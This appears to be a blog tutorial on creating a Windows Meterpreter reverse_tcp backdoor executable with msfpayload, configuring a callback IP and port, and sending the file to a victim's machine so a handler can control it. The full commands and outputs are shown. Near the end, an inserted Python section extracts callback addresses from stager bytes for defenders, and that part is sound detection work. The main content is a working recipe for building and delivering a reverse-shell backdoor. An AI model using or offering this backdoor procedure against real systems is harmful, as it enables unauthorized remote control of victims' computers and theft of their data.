Creating an executable backdoor with Metasploit

You can create an executable backdoor with Metasploit using the msfpayload command; the following steps show the process.

You can do this from the Metasploit console or from your Linux prompt; in both cases the command is the same:

# msfpayload windows/meterpreter/reverse_tcp lhost=<Listening_IP> lport=<Listening_Port> x > backdoor.exe

Listening_IP is the IP of the server that waits for the connection from the backdoor. For example, if you are using BackTrack to attack a machine, you configure the BackTrack IP in your backdoor and then send it to the victim’s machine; when it gets executed, the backdoor connects back to your BackTrack on Listening_Port.

Example:

[root@tmcent01 ~]# msfpayload windows/meterpreter/reverse_tcp lhost=192.168.5.55 lport=4444 x > backdoor.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 290
Options: {"lhost"=>"192.168.5.55", "lport"=>"4444"}

The backdoor.exe file is saved in the path where you executed the command.

The following example shows the same command, this time executed from the Metasploit console; the result is the same:

msf > msfpayload windows/meterpreter/reverse_tcp lhost=192.168.5.55 lport=4444 x > backdoor.exe
[*] exec: msfpayload windows/meterpreter/reverse_tcp lhost=192.168.5.55 lport=4444 x > backdoor.exe

Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 290
Options: {"lhost"=>"192.168.5.55", "lport"=>"4444"}

Once you have the backdoor you’ll have to start a handler, where you’ll be able to listen for and control the victim. To start the handler you can visit our post Starting a Handler with Metasploit.
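From the responder's side, the lhost and lport baked into the payload above are exactly what an analyst wants to recover from a captured sample. The following Python is an added example, not part of the original post: it assumes the unencoded x86 reverse_tcp stager builds its sockaddr_in with two push-immediate instructions (the four IP bytes, then AF_INET followed by the port in network byte order) and scans a buffer for that sequence; the blob it builds for the demonstration is constructed, not a real backdoor.exe.

```python
import re
import struct
from typing import List, Tuple

# Assumption about the unencoded x86 reverse_tcp stager: the sockaddr_in is
# built with two "push imm32" (opcode 0x68) instructions. The first pushes
# the IPv4 address as four raw bytes; the second pushes AF_INET (0x0002,
# little-endian bytes 02 00) followed by the port in network byte order.
# An encoder or a modified template can break this layout, so a miss is
# not proof that no callback address is present.
STAGER_SOCKADDR = re.compile(
    rb"\x68(?P<ip>[\x00-\xff]{4})\x68\x02\x00(?P<port>[\x00-\xff]{2})"
)


def extract_reverse_tcp_config(blob: bytes) -> List[Tuple[str, int]]:
    """Return every (lhost, lport) pair whose sockaddr_in pattern appears in blob."""
    found = []
    for m in STAGER_SOCKADDR.finditer(blob):
        ip = ".".join(str(b) for b in m.group("ip"))
        port = struct.unpack(">H", m.group("port"))[0]
        found.append((ip, port))
    return found


def build_sample(lhost: str, lport: int) -> bytes:
    """Construct a stand-in blob (not a real binary) that carries the same
    push sequence, so the extractor can be exercised offline."""
    ip_bytes = bytes(int(octet) for octet in lhost.split("."))
    return (
        b"MZ" + b"\x90" * 16            # constructed filler, no real PE header
        + b"\x68" + ip_bytes            # push <lhost>
        + b"\x68\x02\x00" + struct.pack(">H", lport)  # push AF_INET, <lport>
        + b"\x89\xe6" + b"\x00" * 8     # constructed trailing bytes
    )


if __name__ == "__main__":
    sample = build_sample("192.168.5.55", 4444)
    for host, port in extract_reverse_tcp_config(sample):
        print(f"reverse_tcp callback -> {host}:{port}")
```

Run it against a suspect file's bytes instead of build_sample() to list the callback addresses a sample would contact, which is what you then block or hunt for in firewall and proxy logs.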

You can also send your comments and questions to our Twitter account, @redinskala, where you can find more info and security tips.
